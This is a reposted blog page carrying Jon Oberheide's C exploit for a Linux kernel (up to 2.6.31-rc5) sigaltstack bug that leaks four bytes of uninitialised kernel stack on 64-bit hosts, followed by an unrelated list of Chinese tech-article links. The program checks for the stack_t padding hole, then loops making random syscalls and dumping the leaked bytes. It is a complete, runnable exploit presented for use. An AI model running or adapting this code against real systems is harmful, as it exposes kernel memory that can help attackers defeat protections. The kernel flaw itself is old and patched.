houwenhui
houwenhui

Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit

 

 

-

 

 

/*
 * sigaltstack-leak.c
 *
 * Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
 * Jon Oberheide <[email protected]>
 * http://jon.oberheide.org
 *
 * Information:
 *
 *   http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856
 *
 *   Ulrich Drepper correctly points out that there is generally padding in
 *   the structure on 64-bit hosts, and that copying the structure from
 *   kernel to user space can leak information from the kernel stack in those
 *   padding bytes.
 *
 * Notes:
 *
 *   Only 4 bytes of uninitialized kernel stack are leaked in the padding
 *   between stack_t's ss_flags and ss_size.  The disclosure only affects
 *   affects 64-bit hosts.
 */

#include <stdio.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <time.h>
#include <sys/syscall.h>
#include <sys/types.h>

const int randcalls[] = {
 0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16,
 21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73,
 78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108,
 109, 110, 11, 112, 113, 114, 116, 117, 118, 119,
 120, 121, 121, 123, 124, 125, 140, 141, 143, 146
};

void
dump(const unsigned char *p, unsigned l)
{
 printf("stack_t:");
 while (l > 0) {
  printf(" ");
  if (l == 12) {
   printf("*** ");
  }
  printf("%02x", *p);
  if (l == 9) {
   printf(" ***");
  }
  ++p; --l;
 }
 printf("\n");
}

int
main(void)
{
 char *p;
 int call, ret;
 size_t size, ftest, stest;
 stack_t oss;

 size = sizeof(stack_t);

 printf("[+] Checking platform...\n");

 if (size == 24) {
  printf("[+] sizeof(stack_t) = %zu\n", size);
  printf("[+] Correct size, 64-bit platform.\n");
 } else {
  printf("[-] sizeof(stack_t) = %zu\n", size);
  printf("[-] Error: you do not appear to be on a 64-bit platform.\n");
  printf("[-] No information disclosure is possible.\n");
  exit(1);
 }

 ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags);
 stest = offsetof(stack_t, ss_size);

 printf("[+] Checking for stack_t hole...\n");

 if (ftest != stest) {
  printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest);
  printf("[+] Hole in stack_t present!\n", ftest, stest);
 } else {
  printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest);
  printf("[-] Error: No hole in stack_t, something is quite wrong.\n");
  exit(1);
 }

 printf("[+] Ready to call sigaltstack.\n\n");

 for (ret = 5; ret > 0; ret--) {
  printf("%d...\n", ret);
  sleep(1);
 }
 srand(time(NULL));

 while (1) {
  /* random stuff to make stack pseudo-interesting */
  call = rand() % (sizeof(randcalls) / sizeof(int));
  syscall(randcalls[call]);

  ret = sigaltstack(NULL, &oss);
  if (ret != 0) {
   printf("[-] Error: sigaltstack failed.\n");
   exit(1);
  }

  dump((unsigned char *) &oss, sizeof(oss));
 }

 return 0;
}

你可能感兴趣的:(linux,职场,休闲,exploit)

  • go关闭linux进程,Golang信号处理和优雅退出守护进程 凯然 go关闭linux进程
    Golang中的信号处理信号类型个平台的信号定义或许有些不同。下面列出了POSIX中定义的信号。Linux使用34-64信号用作实时系统中。命令mansignal提供了官方的信号介绍。在POSIX.1-1990标准中定义的信号列表信号值动作说明SIGHUP1Term终端控制进程结束(终端连接断开)SIGINT2Term用户发送INTR字符(Ctrl+C)触发SIGQUIT3Core用户发送QUIT
  • 【策划所需编程知识】 叫我六胖子 笔记游戏
    1、TCP与UDP名称TCPUDP方式先奏后斩先斩后奏优点防外挂,慢但不出错用户体验好常用游戏MMORPGFPS、MOBA、IO类2、弱联网与实时联网名称弱联网实时联网方式只在必要时链接频率很高特点频率低频率高特点对宽带要求不高对宽带要求高常用游戏卡牌、放置挂机、轻度休闲、SLGFPS、MOBA、IO类
  • Linux工作常用命令记录 A little storm linuxubuntujvmc++
    Linux常用命令#列出当前系统中所有的网络连接和监听端口,可通过grep配合查找需要的信息netstat-nat#列出所有进程信息,可通过grep配合查找需要的信息psaux#查看防火墙规则iptables-L#查找文件,如查找RDB_SVRfind/-name"RDB_SVR"#查看所有磁盘空间使用情况df-h#查看文件或目录的磁盘空间使用情况,示例为查看当前目录中所有文件和目录的空间使用情况
  • linux日志文件详解 MagnumOvO 云计算linux5Glinux运维centos
    目录一、日志文件的分类二、日志文件位置三、常见日志文件1.分析日志文件2.内核及系统日志四、日志消息等级五、日志文件分析1.用户日志2.程序日志六、日志分析注意事项一、日志文件的分类日志文件是用于记录Linux系统中各种运行消息的文件,相当于Linux主机的“日记”。不同的日志文件记载了不同类型的信息,如Linux内核消息、用户登录事件、程序错误等·日志文件对于诊断和解决系统中的问题很有帮助,因为
  • Linux系统日志管理 多肉葡萄~ linux运维服务器
    日志文件作用日志文件用于记录linux系统的各种运行信息的文件,相当于linux主机的日记,不同的日志文件记载了不同类型的信息,如Linux内核消息、用户登录事件、程序错误等。日志文件对于诊断和解决问题很有帮助,因为linux运行的程序通常把系统的消息和错误写入对应的日志文件,这样系统可以有据可查,此外,当主机遭受攻击时,日志文件还可以帮助寻找攻击者留下的痕迹。几种日志管理工具的介绍在Linux系
  • 【lua】Linux上安装lua和luarocks包管理工具 果壳~ lualinux开发语言
    目录安装lua安装luarocksluarocks其他命令安装lua首先打开lua官网https://lua.org点击download就可以看到安装脚本新建一个目录将压缩包下载到这个目录里curl-L-R-Ohttps://www.lua.org/ftp/lua-5.4.8.tar.gztarzxflua-5.4.8.tar.gzcdlua-5.4.8makealltest#最后还得加上make
  • Linux journal 日志大小限制与管理详解 XMYX-0 linux运维服务器
    文章目录Linuxjournal日志大小限制与管理详解journal日志的默认存储位置journal日志大小限制配置查看当前日志占用情况手动清理日志文件按大小清理日志按时间清理日志按文件数清理日志journald日志机制原理简析(适当加点原理)日志筛选与导出技巧(实用提升)按服务名筛选按时间范围查看日志导出日志为纯文本文件实时查看日志(类似`tail-f`)常见问题与踩坑提醒(经验+防踩坑)问题1
  • 【安装Stable Diffusion以及遇到问题和总结】 岁月玲珑 AIstablediffusionAI编程AI作画
    在本地安装部署StableDiffusion,需要准备好硬件环境,安装相关依赖,然后配置模型。下面为你详细介绍安装部署的步骤:一、硬件要求显卡:需要NVIDIAGPU,显存至少6GB,推荐8GB及以上。系统:Windows10/11、Linux(Ubuntu等)或macOS(需要Rosetta2)。内存:至少16GBRAM。存储空间:准备10GB以上的可用空间。二、软件准备首先要安装Python和
  • RK系列(RK3568) GPIO按键驱动 和Android key新值添加 hmbbPdx_ RK驱动开发Rk开发(RK3568)android驱动开发linux
    平台:Android12SOC:RK3568kernel:Linux-4.19首先按键驱动那块不用我们自己写,内核本身有支持可以查看kernel-4.19-driver/input/keyboard/gpio_keys.c我们先描述好设备树添加GPIO4-A0的按键gpio-keys{compatible="gpio-keys";#address-cells=;#size-cells=;autor
  • Linux设备驱动开发详解 - 基于Linux 4.0内核
    Linux设备驱动开发详解-基于Linux4.0内核去发现同类优质开源项目:https://gitcode.com/欢迎使用《Linux设备驱动开发详解》资源库本资源库致力于为Linux设备驱动开发者提供一份基于Linux4.0内核的详细指南和实践材料。随着Linux内核不断迭代,理解并掌握其最新特性和驱动开发的方法论变得尤为重要。本项目特别针对那些想要深入了解Linux内核机制、尤其是驱动程序开
  • 深入探索Linux设备驱动开发:基于Linux 4.0内核的全面指南 邴洁沫Edna
    深入探索Linux设备驱动开发:基于Linux4.0内核的全面指南【下载地址】Linux设备驱动开发详解基于最新的Linux4.0内核配套光盘分享本仓库提供了一个资源文件的下载,该资源文件是《Linux设备驱动开发详解:基于最新的Linux4.0内核配套光盘》的配套光盘内容。该光盘包含了与Linux4.0内核相关的设备驱动开发所需的详细资料和示例代码,旨在帮助开发者更好地理解和掌握Linux设备驱
  • Linux 设备树详解:从概念到实战 Jay_515 Linux学习嵌入式linux设备树
    关键词:设备树(DeviceTree)、DTS、DTC、DTB、嵌入式Linux驱动开发为什么需要设备树?在旧版Linux内核中,硬件信息(如内存映射、外设地址、中断号等)直接硬编码在内核源码中。这导致:内核臃肿,需为不同硬件编译不同版本硬件变动需重新编译内核代码冗余严重(一个board-*.c文件对应一块开发板)设备树(DeviceTree)的引入彻底解决了这一问题!它通过描述硬件拓扑结构的文本
  • Linux 驱动开发详解:从入门到实践 Jay_515 Linux学习linux驱动嵌入式
    本文带你深入理解Linux内核驱动的核心机制,掌握从零编写字符设备驱动的完整流程一、Linux驱动概述:内核与硬件的桥梁Linux驱动是操作系统内核的一部分,负责管理硬件设备并向上层应用程序提供统一接口。其核心价值在于:抽象硬件细节:让应用程序无需关心硬件具体实现统一设备接口:通过标准接口(如字符设备、块设备)访问硬件内核级资源管理:直接操作硬件寄存器,管理中断、DMA等Linux驱动的类型:驱动
  • Shell脚本编程:Linux自动化的瑞士军刀 半夜偷你家裤衩子 Linuxlinux自动化chrome
    导读:厌倦了重复执行相同的命令序列?想要让你的Linux系统自动完成繁琐任务?Shell脚本就是你的不二选择!本文将带你从零开始掌握Shell脚本编程,从基本语法到高级技巧,让你的工作效率提升10倍。无论你是Linux新手还是经验丰富的管理员,这篇文章都能帮你解锁Shell脚本的强大潜力!本文是《从入门到精通渐进式学习Linux》系列的第12章。通过这篇文章,你将学会如何用Shell脚本实现系统管
  • mongodb和redis的区别: huangbfeng mongodbredis数据库
    1、内存管理机制Redis数据全部存在内存,定期写入磁盘,当内存不够时,可以选择指定的LRU算法删除数据。MongoDB数据存在内存,由linux系统mmap实现,当内存不够时,只将热点数据放入内存,其他数据存在磁盘。2、支持的数据结构Redis支持的数据结构丰富,包括hash、set、list等。MongoDB数据结构比较单一,但是支持丰富的数据表达,索引,最类似关系型数据库,支持的查询语言非常
  • fish安装node.js环境 翻滚吧键盘 openSUSEnode.jschrome前端
    为什么强调fishshell,因为fishshell的缘故,不能直接执行node.js官网的命令好的,您遇到了一个非常典型且重要的问题。请仔细阅读我的分析,这能帮您彻底解决问题。问题诊断您看到的所有错误,归根结底有两个核心原因:您正在使用FishShell:从命令行末尾的fish:提示可以看出,您使用的不是Linux默认的bash,而是fish。FishShell的脚本语法与bash不兼容。错误的
  • 深入理解 Linux `poll` 模型:`select` 的增强版 蜗牛沐雨 异步编程并发编程C++linux网络编程并发编程
    在LinuxI/O多路复用模型中,poll紧随select之后,作为其功能更强大、限制更少的继任者。虽然select在处理并发连接方面迈出了重要一步,但其自身的一些缺陷促使了poll的诞生。poll模型同样允许单个进程同时监控多个文件描述符,等待I/O事件,但在文件描述符数量限制和接口使用上进行了优化。poll为什么比select更优?select的一个主要痛点是其对文件描述符数量的硬性限制(通常
  • linux网络编程之SCTP套接字常用接口 码莎拉蒂 . Linux网络编程linux网络编程SCTP套接字常用接口
    转载地址:oracle开发帮助文档:http://docs.oracle.com/cd/E19253-01/819-7052/index.htmlSCTP套接字接口当socket()调用为IPPROTO_SCTP创建套接字时,它会调用特定于SCTP的套接字创建例程。针对SCTP套接字执行的套接字调用会自动调用相应的SCTP套接字例程。在一对一套接字中,每个套接字都对应一个SCTP关联。可以通过调用
  • Linux 命令:ls
    Linuxls命令详细教程一、ls命令概述ls是Linux系统中最常用的命令之一,全称“list”,用于列出目录下的文件和子目录。它不仅能显示文件基本信息,还能通过丰富的选项控制显示格式、排序方式、隐藏文件等,是文件管理的基础工具。资料已经分类整理好:https://pan.quark.cn/s/26d73f7dd8a7二、ls命令基本语法ls[选项][文件或目录]核心选项分类说明(常用选项需熟练
  • linux c的结构体赋值方法 盼雨落,等风起 c语言
    主要使用的是第一种,类似数组赋值#includetypedefstructal_data{inta;intb;intc;charch;}al_data;structal_dataad={1,3,9,'A',};structal_dataad2={.a=2,.b=6,.c=18,.ch='B',};structal_dataad3={a:3,b:9,c:27,ch:'C'};intmain(){pr
  • Docker 安装与配置 详解——AI教你学Docker LuckyLay AI教你学Dockerdocker容器运维
    1.2Docker安装与配置详解本节围绕Docker的安装方法及常见配置,帮助你在不同平台上顺利部署Docker,并理解其关键配置项。一、Docker安装1.支持的操作系统Linux(主流发行版:Ubuntu、CentOS、Debian、Fedora、openSUSE等)Windows(Windows10/11Pro/Enterprise、WindowsServer2016及以上)macOS(In
  • Docker基本概念——AI教你学Docker LuckyLay docker容器运维
    1.1Docker概念详解1.Docker是什么?Docker是一个开源的应用容器引擎,它让开发者可以将应用及其依赖打包到一个可移植的容器(Container)中,并在任何支持Docker的Linux、Windows或macOS系统上运行。这样做极大地提升了应用的可移植性、一致性和部署效率。2.核心概念2.1镜像(Image)镜像是一个只读的模板,包含了运行容器所需的程序、库、环境变量和配置文件等
  • Dpdk环境的搭建 Flying Fish(HHH) dpdk分布式计算机网络
    1、下载源码:gitclonehttps://github.com/DPDK/dpdk2、编译命令CC=gccmeson-Dlibdir=lib--default-library=static-Dexamples=allx86_64-native-linuxapp-gcc-Dbuildtype=debugoptimizedninja-Cx86_64-native-linuxapp-gcc-j110
  • linux的常用命令 Flying Fish(HHH) linux服务器运维
    一、进程相关:查看进程:ps-aux|grep进程id查看僵尸进程:ps-ef|grepdefunct(进程名称)如何查看线程使用哪个so库?lsof-ppid|grepbasecat/proc/376421/maps|grep'\.so'查看对应的.so文件是否已经成功转成汇编yuminstallbinutils-2.37-14.oe2203sp1.x86_64objdump-Sllibbase
  • Maven 多模块项目调试与问题排查总结
    博主简介:CSDN博客专家,历代文学网(PC端可以访问:https://literature.sinhy.com/#/?__c=1000,移动端可微信小程序搜索“历代文学”)总架构师,15年工作经验,精通Java编程,高并发设计,Springboot和微服务,熟悉Linux,ESXI虚拟化以及云原生Docker和K8s,热衷于探索科技的边界,并将理论知识转化为实际应用。保持对新技术的好奇心,乐于分
  • 如何使用 ligpng 库进行图片解码应用开发openwrt linux sdd20x平台 ruihuan_2000 SSD20Xopenwrtlinux嵌入式c++
    文章目录前言一、libpng是什么?二、使用步骤1.引入库及头文件2.解码过程总结前言如何使用libpng库进行图片解码应用开发。一、libpng是什么?libpng是一个开源的、跨平台的图像处理库,用于处理和支持PNG(PortableNetworkGraphics)图像格式。PNG是一种无损压缩的图像格式,广泛用于互联网上的图像传输和存储。libpng提供了一系列的API和函数,使开发者可以在
  • 对话红帽副总裁曹衡康:CentOS Stream是CentOS的未来 「已注销」 技术干货centoslinux服务器
    作为CentOS未来新的版本,CentOS Stream代表了进一步推动Linux创新的最好方式,它让更广泛的生态系统社区与红帽企业Linux的开发有更紧密的联系。“世界在不断变化,开发流程也在不断地创新、优化,红帽认为,把CentOS Stream放在RHEL之前,是更优化的做法。CentOS Stream的场景会比过去的CentOS更好、更适合整个社区的发展。”曹衡康说道。2020年,红帽公司
  • JavaIO四大模型:NIO(IO多路复用) Colourful. Java网络编程java网络
    文章目录概述NIO涉及到的名词JavaNIO服务端和客户端流程概述Java中的Selector和Linux中的epoll都是基友IO多路复用的,有时也被称为异步阻塞IO。我们之前介绍过,同步阻塞I/O和同步非阻塞IO。对于同步阻塞I/O来说,每次进行I/O时,我们的用户线程都会阻塞,显然这在高并发下效率很低。对于同步非阻塞I/O来说,每次进行I/O,虽然在内核缓冲区还没有数据的情况下,会给用户线程
  • 【Linux命令大全】Linux虚拟化技术终极指南:从KVM到容器的深度解析 全息架构师 Linux前沿技术与应用linux运维服务器
    【Linux命令大全】Linux虚拟化技术终极指南:从KVM到容器的深度解析行业洞察:全球90%的云服务基于Linux虚拟化技术!掌握这些技能可提升500%的资源利用率!本文包含180+配置案例,40张架构图,企业级虚拟化方案全公开!前言:为什么虚拟化是云计算的基础?在现代数据中心中,我们面临的核心虚拟化挑战:硬件资源的高效分割近原生性能的追求安全隔离的保障混合负载的调度跨平台的兼容性惊人数据:A
  • php 私有变量混淆 gettokenall,解密 - 如何满足PHP源代码加密和混淆的需求 weixin_39629467 php私有变量混淆gettokenall
    最近被要求把产品代码加密,测试了几款容易获得的加密工具,当然对应的解密工具也一样容易找到!易维的那个加密工具貌似需要购买,否则存在使用时间限制,不知道有没有了解实情的兄弟!还有个开源的screw,加密方法是用C写的PHP扩展,但是不清楚的是:PHPscrew加密后的代码是否只能运行在装有screw的Linux环境下?还有就是有没有好的PHP代码混淆工具?微盾的混淆工具很杯具,我的项目代码混淆后无法
  • Linux的Initrd机制 被触发 linux
    Linux 的 initrd 技术是一个非常普遍使用的机制,linux2.6 内核的 initrd 的文件格式由原来的文件系统镜像文件转变成了 cpio 格式,变化不仅反映在文件格式上, linux 内核对这两种格式的 initrd 的处理有着截然的不同。本文首先介绍了什么是 initrd 技术,然后分别介绍了 Linux2.4 内核和 2.6 内核的 initrd 的处理流程。最后通过对 Lin
  • maven本地仓库路径修改 bitcarter maven
    默认maven本地仓库路径:C:\Users\Administrator\.m2 修改maven本地仓库路径方法:     1.打开E:\maven\apache-maven-2.2.1\conf\settings.xml     2.找到        
  • XSD和XML中的命名空间 darrenzhu xmlxsdschemanamespace命名空间
    http://www.360doc.com/content/12/0418/10/9437165_204585479.shtml http://blog.csdn.net/wanghuan203/article/details/9203621 http://blog.csdn.net/wanghuan203/article/details/9204337 http://www.cn
  • Java 求素数运算 周凡杨 java算法素数
    网络上对求素数之解数不胜数,我在此总结归纳一下,同时对一些编码,加以改进,效率有成倍热提高。 第一种:   原理: 6N(+-)1法         任何一个自然数,总可以表示成为如下的形式之一: 6N,6N+1,6N+2,6N+3,6N+4,6N+5 (N=0,1,2,…)   
  • java 单例模式 g21121 java
    想必单例模式大家都不会陌生,有如下两种方式来实现单例模式:   class Singleton { private static Singleton instance=new Singleton(); private Singleton(){} static Singleton getInstance() { return instance; }
  • Linux下Mysql源码安装 510888780 mysql
    1.假设已经有mysql-5.6.23-linux-glibc2.5-x86_64.tar.gz (1)创建mysql的安装目录及数据库存放目录       解压缩下载的源码包,目录结构,特殊指定的目录除外:           
  • 32位和64位操作系统 墙头上一根草 32位和64位操作系统
    32位和64位操作系统是指:CPU一次处理数据的能力是32位还是64位。现在市场上的CPU一般都是64位的,但是这些CPU并不是真正意义上的64 位CPU,里面依然保留了大部分32位的技术,只是进行了部分64位的改进。32位和64位的区别还涉及了内存的寻址方面,32位系统的最大寻址空间是2 的32次方= 4294967296(bit)= 4(GB)左右,而64位系统的最大寻址空间的寻址空间则达到了
  • 我的spring学习笔记10-轻量级_Spring框架 aijuans Spring 3
    一、问题提问:     → 请简单介绍一下什么是轻量级?     轻量级(Leightweight)是相对于一些重量级的容器来说的,比如Spring的核心是一个轻量级的容器,Spring的核心包在文件容量上只有不到1M大小,使用Spring核心包所需要的资源也是很少的,您甚至可以在小型设备中使用Spring。  
  • mongodb 环境搭建及简单CURD antlove WebInstallcurdNoSQLmongo
    一 搭建mongodb环境 1. 在mongo官网下载mongodb 2. 在本地创建目录 "D:\Program Files\mongodb-win32-i386-2.6.4\data\db" 3. 运行mongodb服务 [mongod.exe --dbpath "D:\Program Files\mongodb-win32-i386-2.6.4\data\
  • 数据字典和动态视图 百合不是茶 oracle数据字典动态视图系统和对象权限
    数据字典(data dictionary)是 Oracle 数据库的一个重要组成部分,这是一组用于记录数据库信息的只读(read-only)表。随着数据库的启动而启动,数据库关闭时数据字典也关闭   数据字典中包含   数据库中所有方案对象(schema object)的定义(包括表,视图,索引,簇,同义词,序列,过程,函数,包,触发器等等) 数据库为一
  • 多线程编程一般规则 bijian1013 javathread多线程java多线程
           如果两个工两个以上的线程都修改一个对象,那么把执行修改的方法定义为被同步的,如果对象更新影响到只读方法,那么只读方法也要定义成同步的。        不要滥用同步。如果在一个对象内的不同的方法访问的不是同一个数据,就不要将方法设置为synchronized的。
  • 将文件或目录拷贝到另一个Linux系统的命令scp bijian1013 linuxunixscp
    一.功能说明        scp就是security copy,用于将文件或者目录从一个Linux系统拷贝到另一个Linux系统下。scp传输数据用的是SSH协议,保证了数据传输的安全,其格式如下:        scp 远程用户名@IP地址:文件的绝对路径
  • 【持久化框架MyBatis3五】MyBatis3一对多关联查询 bit1129 Mybatis3
    以教员和课程为例介绍一对多关联关系,在这里认为一个教员可以叫多门课程,而一门课程只有1个教员教,这种关系在实际中不太常见,通过教员和课程是多对多的关系。   示例数据:   地址表:   CREATE TABLE ADDRESSES ( ADDR_ID INT(11) NOT NULL AUTO_INCREMENT, STREET VAR
  • cookie状态判断引发的查找问题 bitcarter formcgi
    先说一下我们的业务背景: 1.前台将图片和文本通过form表单提交到后台,图片我们都做了base64的编码,并且前台图片进行了压缩 2.form中action是一个cgi服务 3.后台cgi服务同时供PC,H5,APP 4.后台cgi中调用公共的cookie状态判断方法(公共的,大家都用,几年了没有问题) 问题:(折腾两天。。。。) 1.PC端cgi服务正常调用,cookie判断没
  • 通过Nginx,Tomcat访问日志(access log)记录请求耗时 ronin47
    一、Nginx通过$upstream_response_time $request_time统计请求和后台服务响应时间 nginx.conf使用配置方式: log_format main '$remote_addr - $remote_user [$time_local] "$request" ''$status $body_bytes_sent "$http_r
  • java-67- n个骰子的点数。 把n个骰子扔在地上,所有骰子朝上一面的点数之和为S。输入n,打印出S的所有可能的值出现的概率。 bylijinnan java
    public class ProbabilityOfDice { /** * Q67 n个骰子的点数 * 把n个骰子扔在地上,所有骰子朝上一面的点数之和为S。输入n,打印出S的所有可能的值出现的概率。 * 在以下求解过程中,我们把骰子看作是有序的。 * 例如当n=2时,我们认为(1,2)和(2,1)是两种不同的情况 */ private stati
  • 看别人的博客,觉得心情很好 Cb123456 博客心情
       以为写博客,就是总结,就和日记一样吧,同时也在督促自己。今天看了好长时间博客:    职业规划:    http://www.iteye.com/blogs/subjects/zhiyeguihua      android学习:    1.http://byandby.i
  • [JWFD开源工作流]尝试用原生代码引擎实现循环反馈拓扑分析 comsci 工作流
        我们已经不满足于仅仅跳跃一次,通过对引擎的升级,今天我测试了一下循环反馈模式,大概跑了200圈,引擎报一个溢出错误      在一个流程图的结束节点中嵌入一段方程,每次引擎运行到这个节点的时候,通过实时编译器GM模块,计算这个方程,计算结果与预设值进行比较,符合条件则跳跃到开始节点,继续新一轮拓扑分析,直到遇到
  • JS常用的事件及方法 cwqcwqmax9 js
    事件 描述 onactivate 当对象设置为活动元素时触发。 onafterupdate 当成功更新数据源对象中的关联对象后在数据绑定对象上触发。 onbeforeactivate 对象要被设置为当前元素前立即触发。 onbeforecut 当选中区从文档中删除之前在源对象触发。 onbeforedeactivate 在 activeElement 从当前对象变为父文档其它对象之前立即
  • 正则表达式验证日期格式 dashuaifu 正则表达式IT其它java其它
    正则表达式验证日期格式 function isDate(d){ var v = d.match(/^(\d{4})-(\d{1,2})-(\d{1,2})$/i); if(!v) { this.focus(); return false; } } <input value="2000-8-8" onblu
  • Yii CModel.rules() 方法 、validate预定义完整列表、以及说说验证 dcj3sjt126com yii
    public array rules () {return} array 要调用 validate() 时应用的有效性规则。 返回属性的有效性规则。声明验证规则,应重写此方法。 每个规则是数组具有以下结构:array('attribute list', 'validator name', 'on'=>'scenario name', ...validation
  • UITextAttributeTextColor = deprecated in iOS 7.0 dcj3sjt126com ios
    In this lesson we used the key "UITextAttributeTextColor" to change the color of the UINavigationBar appearance to white. This prompts a warning "first deprecated in iOS 7.0." Ins
  • 判断一个数是质数的几种方法 EmmaZhao Mathpython
    质数也叫素数,是只能被1和它本身整除的正整数,最小的质数是2,目前发现的最大的质数是p=2^57885161-1【注1】。 判断一个数是质数的最简单的方法如下: def isPrime1(n): for i in range(2, n): if n % i == 0: return False return True 但是在上面的方法中有一些冗余的计算,所以
  • SpringSecurity工作原理小解读 坏我一锅粥 SpringSecurity
      SecurityContextPersistenceFilter   ConcurrentSessionFilter   WebAsyncManagerIntegrationFilter   HeaderWriterFilter   CsrfFilter   LogoutFilter   Use
  • JS实现自适应宽度的Tag切换 ini JavaScripthtmlWebcsshtml5
    效果体验:http://hovertree.com/texiao/js/3.htm   该效果使用纯JavaScript代码,实现TAB页切换效果,TAB标签根据内容自适应宽度,点击TAB标签切换内容页。 HTML文件代码: <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"
  • Hbase Rest API : 数据查询 kane_xie RESThbase
    hbase(hadoop)是用java编写的,有些语言(例如python)能够对它提供良好的支持,但也有很多语言使用起来并不是那么方便,比如c#只能通过thrift访问。Rest就能很好的解决这个问题。Hbase的org.apache.hadoop.hbase.rest包提供了rest接口,它内嵌了jetty作为servlet容器。   启动命令:./bin/hbase rest s
  • JQuery实现鼠标拖动元素移动位置(源码+注释) 明子健 jqueryjs源码拖动鼠标
    欢迎讨论指正!   print.html代码: <!DOCTYPE html> <html> <head> <meta http-equiv=Content-Type content="text/html;charset=utf-8"> <title>发票打印</title> &l
  • Postgresql 连表更新字段语法 update qifeifei PostgreSQL
    下面这段sql本来目的是想更新条件下的数据,可是这段sql却更新了整个表的数据。sql如下: UPDATE tops_visa.visa_order SET op_audit_abort_pass_date = now() FROM tops_visa.visa_order as t1 INNER JOIN tops_visa.visa_visitor as t2 ON t1.
  • 将redis,memcache结合使用的方案? tcrct rediscache
    公司架构上使用了阿里云的服务,由于阿里的kvstore收费相当高,打算自建,自建后就需要自己维护,所以就有了一个想法,针对kvstore(redis)及ocs(memcache)的特点,想自己开发一个cache层,将需要用到list,set,map等redis方法的继续使用redis来完成,将整条记录放在memcache下,即findbyid,save等时就memcache,其它就对应使用redi
  • 开发中遇到的诡异的bug wudixiaotie bug
    今天我们服务器组遇到个问题: 我们的服务是从Kafka里面取出数据,然后把offset存储到ssdb中,每个topic和partition都对应ssdb中不同的key,服务启动之后,每次kafka数据更新我们这边收到消息,然后存储之后就发现ssdb的值偶尔是-2,这就奇怪了,最开始我们是在代码中打印存储的日志,发现没什么问题,后来去查看ssdb的日志,才发现里面每次set的时候都会对同一个key
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他